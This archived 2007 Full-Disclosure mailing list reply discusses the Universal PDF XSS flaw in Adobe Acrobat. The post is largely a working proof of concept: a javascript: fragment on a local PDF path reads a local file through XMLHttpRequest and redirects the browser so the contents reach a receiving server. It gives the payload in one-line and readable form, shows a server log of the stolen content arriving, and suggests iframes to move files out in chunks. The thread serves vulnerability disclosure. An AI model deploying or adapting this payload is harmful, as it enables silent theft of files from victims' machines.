[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <2d6724810701040806s6b507247i904e80f7730960f3@mail.gmail.com>
Date: Thu, 4 Jan 2007 11:06:24 -0500
From: "T Biehn" <tbiehn@...il.com>
To: Full-Disclosure@...ts.grok.org.uk
Subject: Re: Universal PDF XSS After Party
Shows up in a log like this:
127.0.0.1 - - [04/Jan/2007:10:57:03 -0500] "GET
/whatever.htm?content=%3Chtml%3E%3Chead%3E%3Cmeta%20http-equiv=%22content-type%22%20content=%22text/html;charset=ISO-8859-1%22%3E%3Cmeta%20name=%22generator%22%20content=%22Adobe%20GoLive%205%22%3E%3Ctitle%3EAdobe%20Acrobat%20Standard%20and%20Professional%20Read%20Me%3C/title%3E%3C/head%3E%3Cbody%20bgcolor=%22
HTTP/1.1" 404 403 "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:
1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
You could obviously a few iframes open on a site that would transfer each
chunk of the file, 64 bit encoded or what have you.
On 1/4/07, T Biehn <tbiehn@...il.com> wrote:
>
> file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function
> cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
> new ActiveXObject(' Microsoft.XMLHTTP');}catch(e){}try{return new
> XMLHttpRequest();}catch(e){} return null;}var xhr =
> cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(
> xhr.responseText);window.location = "http://localhost:80/whatever.htm?content="
> + xhr.responseText;}};xhr.open('GET', 'file:///C:/ProgramFiles/Adobe/Acrobat
> 6.0/ReadMe.htm', true);xhr.send(null); <- sends a local file to a remote
> location.
>
> Readable:
> function cXHR(){ //Grabs a legit XHR.
> try{
> return new ActiveXObject('Msxml2.XMLHTTP');
> }catch(e){}
> try{
> return new ActiveXObject('Microsoft.XMLHTTP ');
> }catch(e){}
> try{
> return new XMLHttpRequest();
> }catch(e){}
> return null;
> }
> var xhr = cXHR(); //For grabbing
> xhr.onreadystatechange = function(){
> if (xhr.readyState == 4){
> alert(xhr.responseText);
> window.location = "http://localhost:80/whatever.htm?content=" +
> xhr.responseText;
> }
> };
> xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
> true);
> xhr.send(null);
>
> Works in FFOX / Opera, not in IE.
>
> On 1/4/07, pdp (architect) <pdp.gnucitizen@...glemail.com> wrote:
> >
> > Everybody knows about it. Everybody talks about it. We had a nice
> > party. It is time for estimating the damages. In this article I will
> > try to show the impact of the Universal PDF XSS vulnerability by
> > explaining how it can be used in real life situations.
> >
> > http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
> >
> > --
> > pdp (architect) | petko d. petkov
> > http://www.gnucitizen.org
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists